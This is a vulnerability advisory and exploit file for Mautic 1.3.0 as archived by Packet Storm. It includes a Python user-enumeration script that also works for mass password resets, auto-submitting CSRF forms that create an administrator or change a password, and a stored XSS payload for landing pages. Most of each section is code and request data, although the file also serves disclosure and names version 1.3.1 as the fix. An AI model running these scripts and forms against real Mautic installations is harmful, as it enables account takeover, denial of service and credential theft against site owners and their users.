exploit the possibilities

Mautic 1.3.0 CSRF / XSS / User Enumeration / DoS

Mautic 1.3.0 CSRF / XSS / User Enumeration / DoS
Posted Apr 2, 2016
Authored by Mickael Dorigny

Mautic version 1.3.0 suffers from cross site request forgery, denial of service, user enumeration, and cross site scripting vulnerabilities.

tags | exploit, denial of service, vulnerability, xss, csrf
MD5 | 9bc16ea934db5b9beb8349d22a4a4833

Mautic 1.3.0 CSRF / XSS / User Enumeration / DoS

Change Mirror Download
######################################################################
# Exploit Title: Mautic v1.3.0 Multiple Vulnerabilities
# Date: 01/04/2016
# Author: Mickael Dorigny @ Synetis
# Vendor or Software Link: https://www.mautic.org/
# Version: 1.3.0
# Category: Multiple Vulnerabilities
######################################################################

Mautic description :
======================================================================
Mautic is an open source marketing automation platform

Vulnerabilities description :
======================================================================
Mautic version 1.3.0 is vulnerable to multiple vulnerabilities like :
- User Enumeration
- DOS attack
- CSRF (x3)
- Stored XSS

Poc n°1 : User Enumeration
============================================
The password reset process allow an attacker to try a large number of username/mail address so he can find wich username/mail are valid or not. This process allow an attacker to get a list of valid account on the Mautic installation and next perform a brute force attack on these accounts.

PoC :
[URL]
http://MauticServer/s/passwordcheck
[POSTDATA]
passwordreset[identifier]=user&passwordreset[submit]=&passwordreset[_token]=pOiK8nnVsPHkYO2pjJx9iz1jrioXOi0Q7GAdxgEk6jU

When a username/mail is valid, the response of the server is :
"A new password has been generated and will be emailed to you. If you do not receive it within a few minutes, check your spam box and/or contact the system administrator."

When a username/mail isn't valid, the response of the server is :
"No user could be identified with the given value. "

This vulnerablity can be exploited with the following python script :

import requests, time, sys, re
IPServ= "http://10.2.0.109"
if len(sys.argv) > 1:
inputFile = sys.argv[1]
else:
print "[*] Usage : python " + sys.argv[0] + " <user file>"
exit(0)
URL1 = IPServ +'/passwordreset'
URL2 = IPServ +'/passwordreset'
with open(inputFile) as f:
for username in f:
username = username[:-1]
print "[?] Test if "+ username +" exists..."
session = requests.Session()
r1 = session.get(URL1)
token = re.search("token].*value=\"(.*)\"",r1.text, re.IGNORECASE)
data = {"passwordreset[identifier]" : username,
"passwordreset[submit]" : "",
"passwordreset[_token]" : token.group(1)}
r2 = session.post(URL2, data=data)
if r2.text.find("No user could be identified with the given value") == -1:
print "[+] the user ["+ username +"] exists !"
else:
print "[-] Nope ..."

So an attacker can exploit this response difference to do a user enumeration.

PoC n°2 : partial DOS - reset user password
============================================
The password reset process can be used to make a partial DOS attack. This attack is a logical attack because the reset password process isn't correctly implemented.

For a valid username/mail given to the reset password form, the password is immediatly resetted to a random password send by mail. A good impletementation will first ask for a mail validation without changing the password before user validation.

This logical attack will allow an attacker to reset all password of the mautic installation, this can affect the user experience (especially if the attacker run his attacks continuously), HelpDesk saturation, service interruption for user, etc.

This vulnerability can be exploited massivly using the previously exposed python script or manually for a single targetted account.

Note that all the valid username/mail can be find through the "User Enumeration" vulnerability previsouly exposed.

PoC n°3 : CSRF on user/admin creation
============================================
The user creation process isn't protected against CSRF vulnerability. An attacker can force an administrator to create new user and/or new administrator using basic social engineering technics. Victim just have to visit a specific page controlled by the attacker that will make the user execute the correct request.

PoC :
[URL]
http://MauticServer/s/users/new?mauticUserLastActive=1&mauticLastNotificationId=57

[POSTDATA]
user[firstName]=AZEAA&user[lastName]=AAA&user[role]=1&user[position]=&user[signature]=Best+regards,+|FROM_NAME|&user[username]=AZEAZEAAA&user[email]=azeaze@azeaaze.fr&user[plainPassword][password]=321321&user[plainPassword][confirm]=321321&user[timezone]=&user[locale]=&user[isPublished]=1&user[buttons][apply]=

The following HTML file contains an auto-submit form that send to the targeted Mautic correct URL and parameters to create a new user :
<html><body>
<form method=POST action='http://MauticServer/s/users/new?mauticUserLastActive=1&mauticLastNotificationId=57'>
<input type=hidden name='user[firstName]' value='userpp'>
<input type=hidden name='user[lastName]' value='userpp'>
<input type=hidden name='user[role]' value='1'>
<input type=hidden name='user[position]' value=''>
<input type=hidden name='user[signature]' value='Best+regards,+|FROM_NAME|'>
<input type=hidden name='user[username]' value='userpp'>
<input type=hidden name='user[email]' value='userpp@userpp.fr'>
<input type=hidden name='user[plainPassword][password]' value='321321'>
<input type=hidden name='user[plainPassword][confirm]' value='321321'>
<input type=hidden name='user[timezone]' value=''>
<input type=hidden name='user[locale]' value=''>
<input type=hidden name='user[isPublished]' value='1'>
<input type=hidden name='user[buttons][apply]' value=''>
<input style="display:none" type=submit>
<form>
<script>document.forms[0].submit();</script>
</body></html>

Through this vulnerability, an attacker can take control of the Mautic installation by making an administrator create another administrator with pre-defined login and password.

PoC n°4 : CSRF on password change
============================================
The password changing process isn't protected against CSRF vulnerability. An attacker can force an user or an administrator to change his password using basic social engineering technics. Victim just have to visit a specific page controlled by the attacker that will make the user execute the correct request.

PoC :
[URL]
http://MauticServer/s/account?mauticUserLastActive=1&mauticLastNotificationId=48'
[POSTDATA]
user[username]=user&user[firstName]=UserName&user[lastName]=LastName&user[position]=&user[email]=user@example.com&user[timezone]=&user[locale]=&user[plainPassword][password]=321321&user[plainPassword][confirm]=321321&user[signature]=Best+regards,+|FROM_NAME|&user[unlockModel]=user.user&user[unlockId]=1&user[buttons][save]=

The following HTML file contains an auto-submit form that send to the targeted Mautic correct URL and parameters to change user password :

<html><body>
<form method=POST action='http://MauticServer/s/account?mauticUserLastActive=1&mauticLastNotificationId=48'>
<input type=hidden name='user[username]' value='userpp'>
<input type=hidden name='user[firstName]' value='userpp'>
<input type=hidden name='user[lastName]' value='userpp'>
<input type=hidden name='user[position]' value=''>
<input type=hidden name='user[email]' value='userpp@userpp.fr'>
<input type=hidden name='user[timezone]' value=''>
<input type=hidden name='user[locale]' value=''>
<input type=hidden name='user[plainPassword][password]' value='987987'>
<input type=hidden name='user[plainPassword][confirm]' value='987987'>
<input type=hidden name='user[signature]' value='Best+regards,+|FROM_NAME|'>
<input type=hidden name='user[unlockModel]' value='user.user'>
<input type=hidden name='user[unlockId]' value='1'>
<input type=hidden name='user[buttons][save]' value=''>
<input style="display:none" type=submit>
<form>
<script>document.forms[0].submit();</script>
</body></html>

Through this vulnerability, an attacker can take control of the Mautic installation by forcing an administrator to change his password and then connect with the admin account.

PoC n°5 : Stored XSS Landing Page
============================================
Landing page "Title" and "Custom Html Content" input are vulnerable to Stored XSS. We can use some javascript payload to execute javascript instruction in the user/admin browser context.

PoC :
[URL]
http://MauticServer/s/pages/edit/1?mauticUserLastActive=1&mauticLastNotificationId=36 HTTP/1.1
[POSTDATA]
page[title]=Page01+<script>alert(0);</script>&page[alias]=page01Page01+<img+src="X"+/>&page[template]=&page[customHtml]=<html>
<head>
<title></title>
</head>
<body>
<p>Page01+<script>alert(0);</script></p>
</body>
</html>
&page[category]=&page[language]=en&page[translationParent]=&page[isPublished]=1&page[publishUp]=&page[publishDown]=&page[metaDescription]=&page[sessionId]=1&page[redirectType]=&page[redirectUrl]=&page[unlockModel]=page.page&page[unlockId]=1&page[buttons][apply]=

Through this vulnerability, an attacker could tamper with page rendering, redirect victim to fake login page, or capture users credentials such cookies, and especially admin's ones.

PoC n°6 : CSRF Landing page creation
============================================
The landing page creation process isn't protected against CSRF vulnerability. An attacker can force an user or an administrator to create a new landing page using basic social engineering technics. Victim just have to visit a specific page controlled by the attacker that will make the user execute the correct request.

PoC:
[URL]
http://MauticServer/s/pages/new?mauticUserLastActive=1&mauticLastNotificationId=69'
[POSTDATA]
page[title]=Page02&page[template]=&page[customHtml]=<html>
<head>
<title></title>
</head>
<body>
<p>Page02</p>
</body>
</html>
&page[category]=&page[language]=en&page[translationParent]=&page[isPublished]=1&page[publishUp]=&page[publishDown]=&page[metaDescription]=&page[sessionId]=1&page[redirectType]=&page[redirectUrl]=&page[buttons][apply]=

The following HTML file contains an auto-submit form that send to the targeted Mautic correct URL and parameters to create a new Landing page :

<html><body>
<form method=POST action='http://MauticServer/s/pages/new?mauticUserLastActive=1&mauticLastNotificationId=69'>
<input type=hidden name='page[title]' value='Page03'>
<input type=hidden name='page[alias]' value='page02Page02'>
<input type=hidden name='page[template]' value=''>
<input type=hidden name='page[customHtml]' value='<html>
<head>
<title></title>
</head>
<body>
<p>Page02></p>
</body>
</html>
'>
<input type=hidden name='page[category]' value=''>
<input type=hidden name='page[language]' value='en'>
<input type=hidden name='page[translationParent]' value=''>
<input type=hidden name='page[isPublished]' value='1'>
<input type=hidden name='page[publishUp]' value=''>
<input type=hidden name='page[publishDown]' value=''>
<input type=hidden name='page[metaDescription]' value=''>
<input type=hidden name='page[sessionId]' value='1'>
<input type=hidden name='page[redirectType]' value=''>
<input type=hidden name='page[redirectUrl]' value=''>
<input type=hidden name='page[buttons][apply]' value=''>
<input style="display:none" type=submit>
<form>
<script>document.forms[0].submit();</script>
</body></html>

Note that this vulnerability can be combined to "Stored XSS Landing page" to get into a privilege escalation scenario from an external position without any privilege.

Solution:
======================================================================

Update your mautic installation to superior version. (version 1.3.1 can be find here : https://github.com/mautic/mautic/releases/tag/1.3.1)


Additional resources :
======================================================================
- https://youtu.be/TOZOwOYqZ34


Report timeline :
======================================================================
2016-03-16 : Editor informed for vulnerabilities
2016-03-19 : Editor fix vulnerabilities and release news vesion
2016-04-01 : Advisory release

Credits :
======================================================================
Mickael Dorigny - Security Consultant @ Synetis | Information-Security.fr

My Packet Storm Security profile : https://packetstormsecurity.com/files/author/12112/

--
SYNETIS
CONTACT: www.synetis.com | www.information-security.fr
Login or Register to add favorites

File Archive:

October 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    25 Files
  • 2
    Oct 2nd
    13 Files
  • 3
    Oct 3rd
    1 Files
  • 4
    Oct 4th
    1 Files
  • 5
    Oct 5th
    15 Files
  • 6
    Oct 6th
    15 Files
  • 7
    Oct 7th
    15 Files
  • 8
    Oct 8th
    11 Files
  • 9
    Oct 9th
    3 Files
  • 10
    Oct 10th
    1 Files
  • 11
    Oct 11th
    1 Files
  • 12
    Oct 12th
    8 Files
  • 13
    Oct 13th
    12 Files
  • 14
    Oct 14th
    23 Files
  • 15
    Oct 15th
    4 Files
  • 16
    Oct 16th
    13 Files
  • 17
    Oct 17th
    1 Files
  • 18
    Oct 18th
    1 Files
  • 19
    Oct 19th
    27 Files
  • 20
    Oct 20th
    41 Files
  • 21
    Oct 21st
    18 Files
  • 22
    Oct 22nd
    16 Files
  • 23
    Oct 23rd
    2 Files
  • 24
    Oct 24th
    1 Files
  • 25
    Oct 25th
    1 Files
  • 26
    Oct 26th
    17 Files
  • 27
    Oct 27th
    19 Files
  • 28
    Oct 28th
    29 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close